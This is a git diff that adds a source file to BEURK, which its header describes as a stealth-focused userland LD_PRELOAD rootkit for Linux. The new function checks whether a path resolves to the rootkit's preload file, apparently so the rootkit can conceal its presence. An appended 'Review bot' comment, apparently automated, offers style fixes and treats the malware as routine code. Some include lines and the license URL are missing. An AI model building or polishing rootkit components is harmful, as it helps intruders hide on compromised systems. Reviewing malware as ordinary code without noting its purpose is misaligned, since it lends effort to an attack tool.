diff --git a/Makefile b/Makefile
index 06e0374..9225bd2 100644
--- a/Makefile
+++ b/Makefile
@@ -33,6 +33,7 @@ SOURCES = src/init.c \
 src/config.c \
 src/debug.c \
 src/is_hidden_file.c \
+ src/is_ld_preload_file.c \
 src/is_attacker.c \
 src/is_procnet.c \
 src/hide_tcp_ports.c \
diff --git a/src/is_ld_preload_file.c b/src/is_ld_preload_file.c
new file mode 100644
index 0000000..1a71577
--- /dev/null
+++ b/src/is_ld_preload_file.c
@@ -0,0 +1,42 @@
+/*
+ * BEURK is an userland rootkit for GNU/Linux, focused around stealth.
+ * Copyright (C) 2015 unix-thrust
+ *
+ * This file is part of BEURK.
+ *
+ * BEURK is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * BEURK is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with BEURK. If not, see .
+ */
+
+#include /* PATH_MAX */
+#include /* realpath(), free()*/
+#include /* strcmp() */
+#include "beurk.h" /* prototype */
+#include "config.h" /* FILE, MAX_LEN, MAGIC_STRING, LIBRARY_NAME, ... */
+#include "debug.h" /* DEBUG() */
+
+
+int is_ld_preload_file(const char *file) {
+ init();
+ DEBUG(D_INFO, "called is_ld_preload_file()");
+
+ char *path;
+ int ret;
+
+ path = realpath(file, NULL);
+ if (path == NULL)
+ return 0;
+ ret = !strcmp(path, LD_PRELOAD);
+ free(path);
+ return ret;
+}
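Review bot: is_ld_preload_file() in the new src/is_ld_preload_file.c has no contract comment, and its return value folds two outcomes together: it returns 0 both when the canonicalised path differs from LD_PRELOAD and when realpath() itself fails. A header above the definition such as `/* Return 1 if realpath(file) equals LD_PRELOAD, 0 otherwise (including when realpath() fails). */` would make that explicit for callers. The include annotated `/* PATH_MAX */` appears unused in this function, since realpath(file, NULL) allocates its own buffer, so that annotation looks stale. For anyone analysing this file, the check is a plain string comparison of the resolved path against the LD_PRELOAD constant, which is defined outside this hunk (presumably in config.h).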